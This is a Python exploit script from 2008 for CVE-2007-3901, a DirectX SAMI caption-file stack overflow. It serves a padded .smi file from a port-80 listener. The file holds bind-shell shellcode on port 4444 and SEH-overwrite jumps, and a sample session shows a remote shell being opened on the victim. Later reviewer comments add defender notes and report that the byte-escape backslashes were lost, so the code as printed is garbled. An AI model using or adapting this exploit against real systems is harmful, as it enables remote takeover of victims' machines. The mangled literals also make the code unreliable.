# Title : Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit
# Published : 2008-01-08
# Author : Matteo Memelli
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# http://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# ESPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Windows Media Player Open---> http://attacker/anyfile.smi
# .smi extension is necessary, filename can be anything.
#
# badrobot:/home/matte# ./mplayer.py
# [+] Listening on port 80
# [+] Connection accepted from: 192.168.1.243
# [+] Payload sent, check your shell on 192.168.1.243 port 4444
# badrobot:/home/matte# nc 192.168.1.243 4444
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Documents and Settings\ryujin\Desktop>ipconfig
# ipconfig
#
# Windows 2000 IP Configuration
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.243
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . :
#
# C:\Documents and Settings\ryujin\Desktop>
##########################################################################
from socket import *
# SMI BODY
# Leading part of the SAMI (.smi) caption document that is served to the
# client (CVE-2007-3901, see the file header). Everything here is ordinary
# SAMI/CSS markup; the value of the `pippo` attribute on <SYNC> is what the
# rest of the script pads out to an abnormal length. The literal is closed
# with `""""`, i.e. the attribute's opening double quote is the last
# character of this string and the value is left open for the appends below.
body = """<SAMI>
<HEAD>
<STYLE TYPE="text/css">
<!--
P {
font-size: 1em;
font-family: Arial;
font-weight: normal;
color: #FFFFFF;
background: #000000;
text-align: center;
padding-left: 5px;
padding-right: 5px;
padding-bottom: 2px;
}
.ENUSCC { Name: English; lang: EN-US-CC; }
-->
</STYLE>
</HEAD>
<BODY>
<SYNC Start="0" pippo=""""
# Metasploit bind shell on port 4444 EXITFUNC seh
# NOTE(review): in this listing the byte-escape backslashes did not survive
# extraction, so each literal below is plain ASCII text ("xfcx6a...") rather
# than the byte string the comment above describes. The port number is the
# one echoed by the final print statement of the script.
shellcode = (
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"
)
# Fill out the still-open `pippo` attribute value: ~22 KB of filler, the
# payload, then a ~140 KB tail of filler before the attribute and the
# document are finally closed. A single attribute value this large (roughly
# 165 KB in total) is far outside anything a genuine caption file carries,
# which is the characteristic a content filter or IDS signature can key on
# for this trigger (an application/smil body of that shape).
# NOTE(review): as with the shellcode, the escape backslashes in the short
# literals here ('x90', 'xeb...') are lost in this listing.
body += 21988*'A'
body += 'x90'*16 # NOP Slide
body += shellcode + 'C'*67 # to SEH...
body += 'xebx06x90x90x2bx1exe1x77' # ShortJmp, and SEH overwrite
body += 'x90'*4 + 'xE9x6BxFExFFxFFx90x90' # NearJmp, back to shellcode
body += 143505*'E' + '">'
body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>'
# RESPONSE HEADER
# Minimal HTTP/1.1 response prefix. Per the author's notes in the file header,
# the .smi extension on the requested URL is what matters to the player, not
# this content type. The `rn` fragments are CRLF escapes with their
# backslashes lost in extraction, so as printed the lines are not terminated.
header = (
'HTTP/1.1 200 OKrn'
'Content-Type: application/smilrn'
'rn'
)
# Complete wire response: header block followed by the padded SAMI body.
evilbuf = header + body
# Single-shot listener (Python 2 syntax: print statements, str bodies).
# Binds every interface on TCP/80, serves exactly one client with the same
# response regardless of what was requested, then exits.
# Defender's view: the network artefacts are one unusually large
# application/smil response from an ad-hoc port-80 listener, followed by the
# victim opening an inbound listener on 4444 (as the final print states).
# Mitigation for the parsing flaw itself is the vendor's DirectX security
# update for CVE-2007-3901.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)  # request is read once and discarded; no path or extension check
c.send(evilbuf)  # send() may transmit fewer bytes than the buffer; return value is not checked
print "[+] Payload sent, check your shell on %s port 4444" % addr[0]
c.close()
s.close()